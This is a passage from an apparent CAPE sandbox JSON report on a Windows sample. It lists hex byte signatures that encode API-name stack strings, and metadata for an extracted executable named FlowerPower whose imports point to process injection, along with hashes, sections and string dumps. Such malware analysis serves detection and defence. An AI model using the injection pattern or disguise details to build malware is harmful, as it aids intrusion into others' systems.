FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6B FD FF FF 54 C6 85 6C FD FF FF 69 C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6C FD FF FF 69 C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6D FD FF FF 63 C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6E FD FF FF 6B C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 6F FD FF FF 43 C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 70 FD FF FF 6F C6 85 71 FD FF FF 75 C6 85 72 FD FF FF 6E C6 85 73 FD FF FF 74 C6 85 74 FD FF FF 00 }", "{ C6 85 EF FA FF FF 63 C6 85 F0 FA FF FF 74 C6 85 F1 FA FF FF 69 C6 85 F2 FA FF FF 6F C6 85 F3 FA FF FF 6E C6 85 F4 FA FF FF 00 }", "{ C6 85 F0 FA FF FF 74 C6 85 F1 FA FF FF 69 C6 85 F2 FA FF FF 6F C6 85 F3 FA FF FF 6E C6 85 F4 FA FF FF 00 }", "{ C6 85 D4 FC FF FF 56 C6 85 D5 FC FF FF 69 C6 85 D6 FC FF FF 72 C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D5 FC FF FF 69 C6 85 D6 FC FF FF 72 C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D6 FC FF FF 72 C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D7 FC FF FF 74 C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D8 FC FF FF 75 C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 D9 FC FF FF 61 C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DA FC FF FF 6C C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DB FC FF FF 41 C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DC FC FF FF 6C C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DD FC FF FF 6C C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 DE FC FF FF 6F C6 85 DF FC FF FF 63 C6 85 E0 FC FF FF 45 C6 85 E1 FC FF FF 78 C6 85 E2 FC FF FF 00 }", "{ C6 85 6E FB FF FF 6D C6 85 6F FB FF FF 6F C6 85 70 FB FF FF 72 C6 85 71 FB FF FF 79 C6 85 72 FB FF FF 00 }", "{ C6 85 C6 FE FF FF 6E C6 85 C7 FE FF FF 5C C6 85 C8 FE FF FF 63 C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 C7 FE FF FF 5C C6 85 C8 FE FF FF 63 C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 C8 FE FF FF 63 C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 C9 FE FF FF 6F C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 CA FE FF FF 6D C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 CB FE FF FF 6D C6 85 CC FE FF FF 61 C6 85 CD FE FF FF 6E C6 85 CE FE FF FF 64 C6 85 CF FE FF FF 00 }", "{ C6 85 A3 F5 FF FF 6C C6 85 A4 F5 FF FF 6C C6 85 A5 F5 FF FF 22 C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A4 F5 FF FF 6C C6 85 A5 F5 FF FF 22 C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A5 F5 FF FF 22 C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A6 F5 FF FF 29 C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A7 F5 FF FF 2E C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A8 F5 FF FF 52 C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }", "{ C6 85 A9 F5 FF FF 75 C6 85 AA F5 FF FF 6E C6 85 AB F5 FF FF 20 C6 85 AC F5 FF FF 22 C6 85 AD F5 FF FF 00 }" ], "addresses": { "ss_small_bp": 34882, "ss_big_bp": 35518 } } ], "cape_yara": [], "clamav": [], "tlsh": "T12844C78FED44DBBAC26E85B6D5AF075E43524322AE0B3647A33D90917913B4323B634D", "sha3_384": "c6e0912245d7cfe3d9c4d9eff23d322c5b924f921f9aa217a2e248e2a56853891df78e01ce6e0565748ced9c9baf1a76", "pe": { "guest_signers": { "aux_sha1": null, "aux_timestamp": null, "aux_valid": false, "aux_error": true, "aux_error_desc": "No signature found.", "aux_signers": [] }, "digital_signers": [], "imagebase": "0x00400000", "entrypoint": "0x0000b10f", "ep_bytes": "558bec6aff68c0c740006896b2400064", "peid_signatures": null, "reported_checksum": "0x00000000", "actual_checksum": "0x00046713", "osversion": "4.0", "pdbpath": null, "imports": { "KERNEL32": { "dll": "KERNEL32.DLL", "imports": [ { "address": "0x40c048", "name": "GetStartupInfoA" }, { "address": "0x40c04c", "name": "GetModuleHandleA" }, { "address": "0x40c050", "name": "LoadLibraryA" }, { "address": "0x40c054", "name": "ExitProcess" }, { "address": "0x40c058", "name": "SetThreadContext" }, { "address": "0x40c05c", "name": "WriteProcessMemory" }, { "address": "0x40c060", "name": "VirtualAllocEx" }, { "address": "0x40c064", "name": "CreateProcessW" }, { "address": "0x40c068", "name": "GetProcAddress" }, { "address": "0x40c06c", "name": "GetModuleFileNameW" } ] }, "GDI32": { "dll": "GDI32.dll", "imports": [ { "address": "0x40c000", "name": "PolyPolygon" }, { "address": "0x40c004", "name": "Escape" }, { "address": "0x40c008", "name": "ExtTextOutA" }, { "address": "0x40c00c", "name": "TextOutA" }, { "address": "0x40c010", "name": "RectVisible" }, { "address": "0x40c014", "name": "PtVisible" }, { "address": "0x40c018", "name": "CreateCompatibleDC" }, { "address": "0x40c01c", "name": "LPtoDP" }, { "address": "0x40c020", "name": "CreateCompatibleBitmap" }, { "address": "0x40c024", "name": "GetMapMode" }, { "address": "0x40c028", "name": "Polygon" }, { "address": "0x40c02c", "name": "PtInRegion" }, { "address": "0x40c030", "name": "CreatePolygonRgn" }, { "address": "0x40c034", "name": "CombineRgn" }, { "address": "0x40c038", "name": "Polyline" }, { "address": "0x40c03c", "name": "BitBlt" }, { "address": "0x40c040", "name": "DPtoLP" } ] }, "MFC42": { "dll": "MFC42.DLL", "imports": [] }, "MSVCRT": { "dll": "MSVCRT.dll", "imports": [ { "address": "0x40c264", "name": "_except_handler3" }, { "address": "0x40c268", "name": "__set_app_type" }, { "address": "0x40c26c", "name": "_setmbcp" }, { "address": "0x40c270", "name": "__CxxFrameHandler" }, { "address": "0x40c274", "name": "_ftol" }, { "address": "0x40c278", "name": "wcslen" }, { "address": "0x40c27c", "name": "wcsstr" }, { "address": "0x40c280", "name": "strstr" }, { "address": "0x40c284", "name": "wcscat" }, { "address": "0x40c288", "name": "wcscpy" }, { "address": "0x40c28c", "name": "__dllonexit" }, { "address": "0x40c290", "name": "_onexit" }, { "address": "0x40c294", "name": "_exit" }, { "address": "0x40c298", "name": "_XcptFilter" }, { "address": "0x40c29c", "name": "exit" }, { "address": "0x40c2a0", "name": "_acmdln" }, { "address": "0x40c2a4", "name": "__getmainargs" }, { "address": "0x40c2a8", "name": "_initterm" }, { "address": "0x40c2ac", "name": "__setusermatherr" }, { "address": "0x40c2b0", "name": "_adjust_fdiv" }, { "address": "0x40c2b4", "name": "_controlfp" }, { "address": "0x40c2b8", "name": "__p__fmode" }, { "address": "0x40c2bc", "name": "__p__commode" } ] }, "USER32": { "dll": "USER32.dll", "imports": [ { "address": "0x40c2c4", "name": "EnableWindow" }, { "address": "0x40c2c8", "name": "GrayStringA" }, { "address": "0x40c2cc", "name": "DrawTextA" }, { "address": "0x40c2d0", "name": "TabbedTextOutA" }, { "address": "0x40c2d4", "name": "LoadCursorA" }, { "address": "0x40c2d8", "name": "SetCursor" }, { "address": "0x40c2dc", "name": "ClientToScreen" }, { "address": "0x40c2e0", "name": "IsIconic" }, { "address": "0x40c2e4", "name": "GetSystemMetrics" }, { "address": "0x40c2e8", "name": "GetClientRect" }, { "address": "0x40c2ec", "name": "DrawIcon" }, { "address": "0x40c2f0", "name": "SendMessageA" }, { "address": "0x40c2f4", "name": "LoadIconA" }, { "address": "0x40c2f8", "name": "ReleaseCapture" }, { "address": "0x40c2fc", "name": "GetWindowRect" }, { "address": "0x40c300", "name": "SetWindowRgn" }, { "address": "0x40c304", "name": "SetCapture" }, { "address": "0x40c308", "name": "CopyRect" } ] } }, "exported_dll_name": null, "exports": [], "dirents": [ { "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", "virtual_address": "0x0000cc50", "size": "0x00000078" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", "virtual_address": "0x00041000", "size": "0x000006ec" }, { "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_TLS", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IAT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", "virtual_address": "0x00000000", "size": "0x00000000" } ], "sections": [ { "name": ".text", "raw_address": "0x00000400", "virtual_address": "0x00001000", "virtual_size": "0x0000b000", "size_of_data": "0x0000a800", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x60000020", "entropy": "6.21" }, { "name": ".rdata", "raw_address": "0x0000ac00", "virtual_address": "0x0000c000", "virtual_size": "0x00002000", "size_of_data": "0x00001400", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "4.08" }, { "name": ".data", "raw_address": "0x0000c000", "virtual_address": "0x0000e000", "virtual_size": "0x00033000", "size_of_data": "0x00033000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "4.55" }, { "name": ".rsrc", "raw_address": "0x0003f000", "virtual_address": "0x00041000", "virtual_size": "0x00001000", "size_of_data": "0x00000800", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "2.86" } ], "overlay": null, "resources": [ { "name": "RT_CURSOR", "offset": "0x000411a8", "size": "0x00000134", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.79" }, { "name": "RT_DIALOG", "offset": "0x000412dc", "size": "0x00000036", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.18" }, { "name": "RT_DIALOG", "offset": "0x00041314", "size": "0x00000042", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.38" }, { "name": "RT_STRING", "offset": "0x00041358", "size": "0x0000004a", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "1.99" }, { "name": "RT_GROUP_CURSOR", "offset": "0x000413a4", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.02" }, { "name": "RT_VERSION", "offset": "0x000413b8", "size": "0x00000334", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "3.32" } ], "versioninfo": [ { "name": "Comments", "value": "" }, { "name": "CompanyName", "value": "" }, { "name": "FileDescription", "value": "FlowerPower" }, { "name": "FileVersion", "value": "1, 0, 0, 1" }, { "name": "InternalName", "value": "FlowerPower" }, { "name": "LegalCopyright", "value": "Copyright (C) 2000" }, { "name": "LegalTrademarks", "value": "" }, { "name": "OriginalFilename", "value": "FlowerPower.EXE" }, { "name": "PrivateBuild", "value": "" }, { "name": "ProductName", "value": "FlowerPower" }, { "name": "ProductVersion", "value": "1, 0, 0, 1" }, { "name": "SpecialBuild", "value": "" }, { "name": "Translation", "value": "0x0c09 0x04b0" } ], "imphash": "676f4bc1db7fb9f072b157186a10179e", "timestamp": "2019-05-29 14:49:02", "icon": null, "icon_hash": null, "icon_fuzzy": null, "icon_dhash": null, "imported_dll_count": 5 }, "data": null, "strings": [ "Polygon46", "strstr", "PolyLine3", "PolyLine8", "PSSSSSSh ", "IsIconic", "PolyLine2", "TextOutA", "PolyLine32", "Polygon35", "VirtualAllocEx", "PolyLine37", "StringFileInfo", "PolyLine49", "TopFlowerPetal1", ".text", "Polygon19", "PolyLine57", "PolyLine9", "CopyRect", "__dllonexit", "D$(];", "PolyLine12", "Polygon74", "KERNEL32.DLL", "RWh`4C", "EnableWindow", "PolyPolygon82", "__setusermatherr", "SUVWj", "Translation", "Polygon64", "Polygon52", "_adjust_fdiv", "Polygon13", "!This program cannot be run in DOS mode.", "PolyLine56", "BitBlt", "PolyLine7", "Polygon60", "MSVCRT.dll", "DPtoLP", "PolyLine53", "PolyLine52", "ProductVersion", "Polygon16", "WRShh", "Polygon92", "PolyLine26", "PolyLine40", "PolyLine39", "PolyPolygon71", "BottoFlowerPetal2", "Polygon77", "_setmbcp", "PolyLine66", "D$B", "LegalTrademarks", "PolyPolygon95", "Polygon56", "WPSh0", "PolyLine68", "PolyPolygon91", "Polygon72", "PolyLine19", "Polygon67", "PolyPolygon83", "PolyLine64", "GetSystemMetrics", "Polygon15", "PolyLine35", "Polygon28", "RWh0mB", "_onexit", "PolyLine67", "Polygon63", "GetClientRect", "Polygon61", "SetCursor", "CreatePolygonRgn", "PolyLine46", "LegalCopyright", "Polygon55", "_acmdln", "L$,_^]", "Polygon1", "Polygon", "wcscat", "Polygon18", "PolyLine36", "PWhx#B", "L$4_^]", "QWh@wB", "QWhPjB", "ClientToScreen", "WRSh`", "wcscpy", "D$X];", "Polygon44", "VS_VERSION_INFO", "Polygon62", "DrawTextA", "RWh0%B", "Polygon65", "PolyLine41", "RightFlowerPetal3", "Polygon34", "Polygon66", "Polygon88", "GetProcAddress", "WQSh0", "PolyLine47", "Polygon40", "PolyLine10", "jjjjjj", "MFC42.DLL", "Polygon14", "Polygon25", "L$pRVW", "PolyLine21", "PolyLine55", "WPSh8", "PolyLine62", "Polygon21", "L$@RVW", "PtVisible", "PolyPolygon80", "@.data", "Comments", "PolyPolygon75", "Polygon48", "PrivateBuild", "_except_handler3", "GetWindowRect", "Polygon24", "Polygon17", "TopFlowerPetal2", "PolyLine43", "T$hRP", "PolyLine5", "Polygon11", "XPVSS", "ExtTextOutA", "FlowerPower", "Polygon22", "RWhPzB", "PolyLine54", "ProductName", "L$p_^[d", "ReleaseCapture", "__p__fmode", "Polygon33", "PolyLine13", "Polygon2", "Polygon10", "PolyLine63", "Polygon29", "QWhP{B", "Polygon81", "Polygon49", "Polygon6", "RectVisible", "FileDescription", "PolyLine45", "T$ RP", "PolyLine20", "Polygon42", "_ftol", "FPj@h", "PolyLine1", "PolyLine23", "SetThreadContext", "Polygon30", "RightFlowerPetal2", "CreateCompatibleBitmap", "LeftFlowerPetal3", "PolyLine44", "PWhP;B", "PolyPolygon78", "GDI32.dll", "Polygon50", "Polygon89", "PolyLine15", "Polygon7", "LoadCursorA", "QWh UB", "PolyLine50", "Polygon51", "BottomFlowerPetal3", "BottomFlowerPetal1", "PolyLine61", "CombineRgn", "Polygon70", "`.rdata", "Copyright (C) 2000", ">\"u:F", "GetMapMode", "SetWindowRgn", "PolyLine60", "__getmainargs", "PolyLine16", "ExitProcess", "PolyLine27", "DrawIcon", "Polygon58", "PolyPolygon76", "PolyLine0", "Polygon0", "PolyLine29", "Polygon85", "WQShp", "Polygon57", "Polygon54", "SendMessageA", "PolyPolygon90", "PolyLine11", "Escape", "Polygon36", "wcslen", "PolyLine31", "PolyLine58", "u4WWj", "PX9\\$l", "PolyLine34", "PolyLine28" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 8, "cape_type": "Unpacked PE Image: 32-bit executable", "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "process_name": "f1e62c0e7345fc825586.exe", "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pid": 4492, "virtual_address": "0x05840000" }, { "name": "877f2ae5e377c2ed56a87a6084b375875c31dc5d4d2327e9d07bf5576f18ffc4", "path": "/opt/CAPEv2/storage/analyses/1889/CAPE/877f2ae5e377c2ed56a87a6084b375875c31dc5d4d2327e9d07bf5576f18ffc4", "guest_paths": "0;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?", "size": 13824, "crc32": "0E2E137A", "md5": "aea6f3c371aade606b9d34ca3779e7b0", "sha1": "5adfe75e707e0c57e1abd988224ac86b185fadd3", "sha256": "877f2ae5e377c2ed56a87a6084b375875c31dc5d4d2327e9d07bf5576f18ffc4", "sha512": "9708c02086e6e8702d0a8a27aa472dcca592099dd104a3dba526b43b385b08e6e8da309e460f8f9c49fc1479108a4aa4ea835b4b17d4555864627849d6c00609", "rh_hash": null, "ssdeep": "384:LCVEf3sgx4444444444444444444444444444:LQ3", "type": "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows", "yara": [], "cape_yara": [], "clamav": [], "tlsh": "T19252F0EFD55E8096F13DD0B2A1DB3D1742AD8879B3509B057FA142CD49C60F9CBD0A8A", "sha3_384": "5a6d3a7b2e2ab6b745cf2760820ab6e6d685f2d3dc143e19c1fdc956bcaa5f8711ca464e8ee9da9881f913698f2b1933", "pe": { "guest_signers": { "aux_sha1": null, "aux_timestamp": null, "aux_valid": false, "aux_error": true, "aux_error_desc": "No signature found.", "aux_signers": [] }, "digital_signers": [], "imagebase": "0x10000000", "entrypoint": "0x00001000", "ep_bytes": "00100000700000000e307e30a830ae30", "peid_signatures": null, "reported_checksum": "0x00000000", "actual_checksum": "0x00003815", "osversion": "6.0", "pdbpath": null, "imports": {}, "exported_dll_name": null, "exports": [], "dirents": [ { "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", "virtual_address": "0x00002264", "size": "0x00000050" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", "virtual_address": "0x00004000", "size": "0x00000084" }, { "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", "virtual_address": "0x000020d0", "size": "0x0000001c" }, { "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_TLS", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "virtual_address": "0x000020f0", "size": "0x00000040" }, { "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IAT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", "virtual_address": "0x00000000", "size": "0x00000000" } ], "sections": [ { "name": ".text", "raw_address": "0x00000400", "virtual_address": "0x00001000", "virtual_size": "0x00001000", "size_of_data": "0x00001000", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x60000020", "entropy": "5.40" }, { "name": ".rdata", "raw_address": "0x00001400", "virtual_address": "0x00002000", "virtual_size": "0x00001000", "size_of_data": "0x00001000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "6.71" }, { "name": ".data", "raw_address": "0x00002400", "virtual_address": "0x00003000", "virtual_size": "0x00001000", "size_of_data": "0x00001000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "7.18" }, { "name": ".reloc", "raw_address": "0x00003400", "virtual_address": "0x00004000", "virtual_size": "0x00000084", "size_of_data": "0x00000200", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x42000040", "entropy": "2.47" } ], "overlay": null, "resources": [], "versioninfo": [], "imphash": "", "timestamp": "2018-08-05 00:55:45", "icon": null, "icon_hash": null, "icon_fuzzy": null, "icon_dhash": null }, "data": null, "strings": [ "5 5$5(5,5054585<5@5D5H5L5P5T5X5\\5`5d5h5l5p5", "1 1-1", ">9>`>", "2.2A2T2g2z2", ".data", "00070D0K0/151<1C1J1U1d1s1", "9!9+929w9", "/Rich3", "6#7R7{7", "2,2D2O2`2|2", ":3<]<", "=$=B=`=", "==>z>R?", "1#12181G1b1l1w1}1", "0)1z1", "<><&=Y=^>", "7 808:8A8J8b8", "9 90969;9B9P9U9a9", "95:::H:n:{:", "0+0D0]0v0", "727E7X7k7", "6U7n7", ".text", "7'7-727c7", "9,929[9b9p9", "41585", "6'6@6M6", "T7X7\\7t7x7|7h:l:", ":2:s;", "0=0h0", ";f;v;", "X0`0d0,181", ":*:4:>:H:s:", "2 2%2*2/242?2R2`2s2", "3 3;3H3[3", ":@;D;X;\\;`;d;", "0F0Z0", "5]5t5", "8!8*8", ";\"<33j3u3", "566D6[6z6", "7,8k8", ";=;J;", "2(212<2C2c2i2o2u2{2", "Vw&COK", "4N5\\5", "=O>s>", "2.2=2Z2w2X3t3", "dn(/3,J-", ";4<^=", "41464;4@4G4N4R4X4v4", "I0&1.1L1V3r3", "!This program cannot be run in DOS mode.", "8%808E8M8]8", "8&939", "7T8e8", "6-6A6]6g6", "8g9|9", "0$1-1O1", "5/7r7", "J2FY!", "2!2A28;V;t;", "4O4{4", "0=1^1", "=9=I=R=Y=", "585Q5j5", "4)4E4a4p4", "383n3", "8g9v9", "< <$<", ";:;^;d;", ">.>9>?>N>T>^>d>h>", "2=3t3", "5!5t7", "9J;e;", "?!?1?7?=?C?N?T?_?e?p?v?", "^AzzIOM", 